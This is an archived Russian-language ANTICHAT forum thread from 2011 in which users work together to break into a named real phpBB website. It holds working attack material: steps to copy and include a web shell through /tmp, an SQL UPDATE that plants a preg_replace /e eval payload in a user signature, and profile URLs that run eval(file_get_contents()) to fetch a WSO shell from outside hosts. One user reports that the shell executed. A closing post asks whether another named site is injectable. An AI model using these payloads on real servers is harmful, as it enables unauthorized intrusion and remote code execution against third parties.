ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.12.2011, 17:20
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от 547
547 said:
я понимаю, я уже перепробовал директории, не хватает прав, еще идеи будут?
залей шелл в тмп и инклуди, если так хочется
|
|
|
19.12.2011, 17:30
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от Konqi
Konqi said:
залей шелл в тмп и инклуди, если так хочется
хочется, но инклуд здесь не прокатит
|
|
|
|
19.12.2011, 17:31
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от 547
547 said:
хочется, но инклуд здесь не прокатит
что значит не прокатит?
разясните
copy('твой_шелл','/tmp/shell');
include('/tmp/shell'); //локальный инклуд
временно сможешь глянуть серв, пока сессия не устареет, а за это время успеешь найти вритабельную папку, или порутить серв если повезет
|
|
|
|
19.12.2011, 17:34
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от Konqi
Konqi said:
что значит не прокатит?
разясните
залить в тмп получилось
потом пробую инклуд
http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&e=include%28%22/var/www/faunaservis/tmp/xxx.php%22%29;
выдает
Parse error: syntax error, unexpected $end in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code(1) : eval()'d code on line 1
может конечно я что то не то делаю, якобы синтаксис не тот...
к тому же директория темп не видна из инета...
|
|
|
|
19.12.2011, 17:36
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
еще вариант eval-ить удаленно, eval(file_get_contents('шелл, без пхп тегов'));
+ посмотрите что там за ядро
Сообщение от None
к тому же директория темп не видна из инета...
=\ поэтому и инклудим, а не открываем шелл по прямому адресу |
|
|
|
19.12.2011, 17:42
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от Konqi
Konqi said:
еще вариант eval-ить удаленно, eval(file_get_contents('шелл, без пхп тегов'));
+ посмотрите что там за ядро
=\ поэтому и инклудим, а не открываем шелл по прямому адресу
ну да..
eval тоже юзал, file_get_contents, d первую очередь пробовал... но увы...
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:file_get_contents("http://.narod.ru/wso2.txt")' WHERE user_id=2;
выдало
Parse error: syntax error, unexpected $end in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code on line 1
Fatal error: preg_replace() [function.preg-replace]: Failed evaluating code: file_get_contents(\"http://.narod.ru/wso2.txt\" in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php on line 825
ядро
Linux nvh103 2.6.32-5-openvz-amd64 #1 SMP Mon Oct 3 05:12:50 UTC 2011 x86_64
там еще написано
This server is protected with the Suhosin Patch 0.9.6.2
подозреваю что не к добру это)
|
|
|
|
19.12.2011, 18:10
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
_http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&bb=eval(file_get_cont ents('http://la2evolution.com/w.txt'));
|
|
|
|
19.12.2011, 19:08
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от wkar
wkar said:
_http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&bb=eval(file_get_cont ents('http://la2evolution.com/w.txt'));
хочешь сказать что у тебя запустился шелл?
|
|
|
|
19.12.2011, 19:12
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
Сообщение от 547
547 said:
хочешь сказать что у тебя запустился шелл?
Да, только чуть-чуть поправил
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]UPDATE faunaservis[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]phpbb_users SET user_sig_bbcode_uid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'(.+)/e\0'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user_sig[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'phpbb:eval(stripslashes($_REQUEST[bb]));'[/COLOR][COLOR="#0000BB"]WHERE user_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
PS
там даже папка на залив есть, шелл отправил в пм
|
|
|
|
20.12.2011, 16:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Is this website vulnerable?
Код:
Code:
http://www.aminfans.com/products.php?p_id=-2
Tried everything still, nothing works. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
